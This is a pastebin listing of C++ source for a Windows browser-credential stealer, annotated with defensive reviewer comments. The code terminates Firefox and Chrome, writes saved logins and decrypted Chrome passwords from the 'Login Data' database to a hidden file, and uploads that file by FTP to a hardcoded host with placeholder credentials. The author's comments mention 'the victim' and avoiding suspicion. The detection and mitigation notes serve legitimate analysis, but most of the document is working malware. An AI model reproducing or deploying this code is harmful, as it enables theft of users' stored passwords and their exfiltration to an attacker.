
Untitled

a guest
Jan 2nd, 2018
  /*
   * Reviewer summary (defensive reading of this listing).
   *
   * This is the entry point of a Windows program that gathers the credentials
   * Mozilla Firefox and Google Chrome have saved for the logged-on user, writes
   * them to a local staging file (data.txt), hands that file to uploadFile()
   * together with a host name and an FTP account, and then deletes the staging
   * file. The author's own comments refer to "the victim"; treat the listing as
   * an information-stealer sample.
   *
   * Not defined in this listing: FindProcessIDs, hide_file, installPath,
   * loadFunctions, showDecryptedPasswords, readRegistryValue, getPath,
   * CrackChrome, dupcat, dupncat, uploadFile, the FILE handle `out` and the
   * sqlite3_* function pointers. Presumably they come from misc.h, firefox.h
   * and chrome.h -- confirm against those headers before relying on any
   * statement below about what they do.
   *
   * Observable behaviour, in execution order:
   *   1. terminate plugin-container.exe, firefox.exe and chrome.exe;
   *   2. create data.txt in the current working directory and hide it;
   *   3. collect Firefox logins through the firefox.h helpers;
   *   4. read Chrome's "Login Data" SQLite database through a dynamically
   *      loaded sqlite3.dll;
   *   5. pass data.txt to uploadFile();
   *   6. delete data.txt.
   *
   * Nothing in this listing elevates privileges: every step runs with the
   * rights of the user who started the program. The exposure it relies on is
   * that credentials a browser stores for a user are readable by any program
   * that user runs. Mitigations that follow from that: keep untrusted
   * executables from running (application allow-listing), avoid storing
   * credentials in the browser profile or protect them with a separate secret
   * (for Firefox, a Primary Password), and restrict outbound FTP from
   * workstations.
   */
  #include <windows.h>
  #include <Shlwapi.h>
  #include <Shlobj.h>
  #include <string>
  #include <cstdio>
  #include <Wincrypt.h>
  #include <fstream>
  #include <tlhelp32.h>
  #include <time.h>
  #include <wininet.h>
  #include "misc.h"
  #include "firefox.h"
  #include "chrome.h"

  #pragma comment (lib, "shlwapi.lib")
  #pragma comment (lib, "crypt32.lib")
  #pragma comment (lib, "Shell32.lib")
  #pragma comment (lib, "wininet.lib")

  using namespace std;

  void main(){
      /*Lets create a timestamp,so we can use it as a file name when we upload data.txt to a FTP server,
      so we can distinguish new uploads from older ones
      */
      // Review: `date` receives the asctime text of the local time and is written
      // into the report; `timeStamp` receives the time_t value as a decimal string
      // and is used further down to build the remote file name.
      time_t timer;
      time(&timer);

      tm info;
      localtime_s(&info, &timer);
      char date[30];
      asctime_s(date, 30, &info);
      char timeStamp[30];
      _i64toa(timer, timeStamp, 10);

      /*Kill any firefox.exe or chrome.exe process to make sure there is nothing standing in our way
      plugin-container.exe must be closed before firefox.exe,otherwise an crushing error of it will rise suspicions
      */
      // Review: FindProcessIDs() is defined elsewhere; as used here it returns an
      // array of process IDs (released with free() below) and stores the element
      // count through its second argument.
      int firefoxCount;
      int chromeCount;
      int firefoxPluginCount;

      DWORD *firefoxProcesses = FindProcessIDs("firefox.exe", &firefoxCount);
      DWORD *chromeProcesses = FindProcessIDs("chrome.exe", &chromeCount);
      DWORD *firefoxPluginProcesses = FindProcessIDs("plugin-container.exe", &firefoxPluginCount);

      // Defender note: each of the three loops opens the target process with
      // PROCESS_ALL_ACCESS and calls TerminateProcess on it. A non-browser process
      // requesting full access to browser processes, and every browser process of
      // a user exiting at the same moment, are both loggable events (for example
      // Sysmon ProcessAccess, event ID 10, and process-termination events) and are
      // the earliest detection opportunity this sample offers.
      for (int i = 0; i < firefoxPluginCount; i++){
          HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, 0, firefoxPluginProcesses[i]);
          if (process != INVALID_HANDLE_VALUE){
              TerminateProcess(process, 0);
          }
          CloseHandle(process);
      }

      for (int i = 0; i < firefoxCount; i++){
          HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, 0, firefoxProcesses[i]);
          if (process != INVALID_HANDLE_VALUE){
              TerminateProcess(process, 0);
          }
          CloseHandle(process);
      }

      for (int i = 0; i < chromeCount; i++){
          HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, 0, chromeProcesses[i]);
          if (process != INVALID_HANDLE_VALUE){
              TerminateProcess(process, 0);
          }
          CloseHandle(process);
      }

      free(firefoxPluginProcesses);
      free(firefoxProcesses);
      free(chromeProcesses);
      // Review: one-second pause after the terminations; presumably it gives the
      // browsers time to exit and release their profile files -- the listing does
      // not say.
      Sleep(1000);

      /*Open the file just for creation,so we will be able to hide it here,before any data is written to it*/

      // Review: `out` is not declared in this listing; presumably a FILE* global
      // from one of the project headers. hide_file() is also defined elsewhere;
      // going by its name and the comment above it marks data.txt as hidden --
      // confirm. The file name is relative, so it lands in the current working
      // directory.
      // Defender note: a file that is created and hidden immediately by a process
      // that then opens browser credential stores is a useful file-system
      // correlation for detection and for triage of an affected host.
      out = fopen("data.txt", "w");
      if (out){
          hide_file("data.txt");
          //write timeStamp at the top
          fprintf(out, "Date: %s", date);
          fclose(out);
      }

      /*Mozilla Firefox part*/
      // Review: installPath(), loadFunctions() and showDecryptedPasswords() are
      // defined elsewhere (presumably firefox.h). Only the control flow is visible
      // here: if loadFunctions(path) succeeds the helper that reports the saved
      // logins runs, otherwise a "not installed" line is appended to data.txt.
      char *path = installPath();
      if (loadFunctions(path)){
          //Lets see the credentials
          showDecryptedPasswords();
          free(path);
      }
      else{
          out = fopen("data.txt", "a+");
          if (out){
              fprintf(out, "Mozilla Firefox is not installed!\n");
              fclose(out);
          }
      }


      /*Google Chrome part*/
      //Load sqlite.dll
      // Review: LoadLibrary is given a bare file name, so sqlite3.dll is resolved
      // through the normal DLL search order; the program expects the DLL to be
      // present on the host (presumably shipped next to the executable).
      HMODULE sqliteLib = LoadLibrary("sqlite3.dll");
      if (sqliteLib){
          //Lets find the functions in the dll
          // Review: the sqlite3_* names assigned here are function-pointer
          // variables declared elsewhere; the results of GetProcAddress are used
          // below without a null check.
          sqlite3_open = (fpSqliteOpen)GetProcAddress(sqliteLib, "sqlite3_open");
          sqlite3_prepare_v2 = (fpSqlitePrepare_v2)GetProcAddress(sqliteLib, "sqlite3_prepare_v2");
          sqlite3_step = (fpSqliteStep)GetProcAddress(sqliteLib, "sqlite3_step");
          sqlite3_column_text = (fpSqliteColumnText)GetProcAddress(sqliteLib, "sqlite3_column_text");
          sqlite3_finalize = (fpSqliteFinalize)GetProcAddress(sqliteLib, "sqlite3_finalize");
          sqlite3_close = (fpSqliteClose)GetProcAddress(sqliteLib, "sqlite3_close");
          // Review: readRegistryValue() is defined elsewhere. Its result is used
          // here only as an "is Chrome installed" test and is released with
          // delete[] below; the string itself is never read. This local also
          // shadows the installPath() function called in the Firefox part.
          char *installPath = readRegistryValue();
          if (installPath != NULL){
              //printf("\n\nGoogle Chrome part:\nInstalled in: %s\n\n", installPath);
              //Now we have to call same sqlite functions to start decrypting this shit:)
              sqlite3_stmt *stmt;
              sqlite3 *db;

              // Review: getPath() is defined elsewhere; with CSIDL_LOCAL_APPDATA
              // it presumably writes the user's local application-data directory
              // into databasePath, to which the fixed profile-relative path of
              // the default Chrome profile's "Login Data" file is appended.
              // Defender note: a process other than the browser opening
              // ...\Google\Chrome\User Data\Default\Login Data is a high-signal
              // event; file-access auditing on that path can record it.
              char databasePath[260];
              getPath(databasePath, CSIDL_LOCAL_APPDATA);
              strcat(databasePath, "\\Google\\Chrome\\User Data\\Default\\Login Data");

              char *query = "SELECT origin_url, username_value, password_value FROM logins";
              //Open the database
              if (sqlite3_open(databasePath, &db) == SQLITE_OK) {
                  if (sqlite3_prepare_v2(db, query, -1, &stmt, 0) == SQLITE_OK) {
                      //Lets begin reading data
                      int entries = 0;
                      out = fopen("data.txt", "a+");
                      if (out){
                          fprintf(out, "\n\n%s", "From Google Chrome:\n\n");
                          while (sqlite3_step(stmt) == SQLITE_ROW) {
                              //While we still have data in database
                              char *url = (char *)sqlite3_column_text(stmt, 0);
                              char *username = (char *)sqlite3_column_text(stmt, 1);
                              BYTE *password = (BYTE *)sqlite3_column_text(stmt, 2); //This is the only encrypted field
                              fprintf(out, "Entry: %d\n", entries);
                              fprintf(out, "Url: %s\n", url);
                              fprintf(out, "Username: %s\n", username);

                              // Review: CrackChrome() is defined elsewhere.
                              // Wincrypt.h and crypt32.lib are pulled in at the
                              // top of the file, so it presumably relies on the
                              // Windows Data Protection API -- confirm in
                              // chrome.h. User-scope DPAPI data can be decrypted
                              // by any code running as the same user, which is
                              // why no password prompt is involved.
                              // NOTE(review): the paste is dated 2018; later
                              // Chrome releases changed how password_value is
                              // protected, so verify against the browser version
                              // under investigation.
                              char *decrypted = CrackChrome(password);
                              fprintf(out, "Password: %s\n", decrypted);
                              fprintf(out, "%s\n", dupncat("-", 50));
                              entries++;
                          }
                          fclose(out);
                      }
                      if (entries == 0){
                          printf("No entries found!\n");
                      }
                  }
                  else
                      printf("Error preparing database!\n");
                  sqlite3_finalize(stmt);
                  sqlite3_close(db);
              }
              else
                  printf("Error opening database!\n");
          }
          else{
              out = fopen("data.txt", "a+");
              if (out){
                  fprintf(out, "Google Chrome is not installed!\n");
                  fclose(out);
              }
          }
          delete[]installPath;
          FreeLibrary(sqliteLib);
      }
      else
          printf("Necessary sqlite dll not found!\n");
      //upload the file
      // Review: uploadFile() and dupcat() are defined elsewhere. wininet.lib is
      // linked and the opening comment names an FTP server as the destination;
      // the remote file name is presumably timeStamp followed by ".txt". The host
      // name and account are string literals compiled into the binary (the three
      // values shown are the author's placeholders), so in a built sample they
      // are recoverable by static string extraction and are usable as indicators.
      // Defender note: outbound FTP from a workstation process is rare in most
      // environments; blocking or alerting on it at the egress point covers this
      // step. If the helper uses plain FTP, the account and the uploaded report
      // cross the network unencrypted and are visible to network monitoring.
      if (uploadFile("data.txt", dupcat(timeStamp,".txt", 0), "mywebsite.com", "myFTPusername", "myFTPpassword")){
          //printf("Success upload!\n");
      }

      //delete the file,so no more data is appended to it,if the victim is opening the program again!
      //we need to create a new file in this case,not use the old one!
      // Defender note: the staging file is removed whether or not the upload
      // succeeded, so its absence proves nothing during triage; on NTFS the
      // create and delete of data.txt may still be recorded in the change journal.
      unlink("data.txt");
  }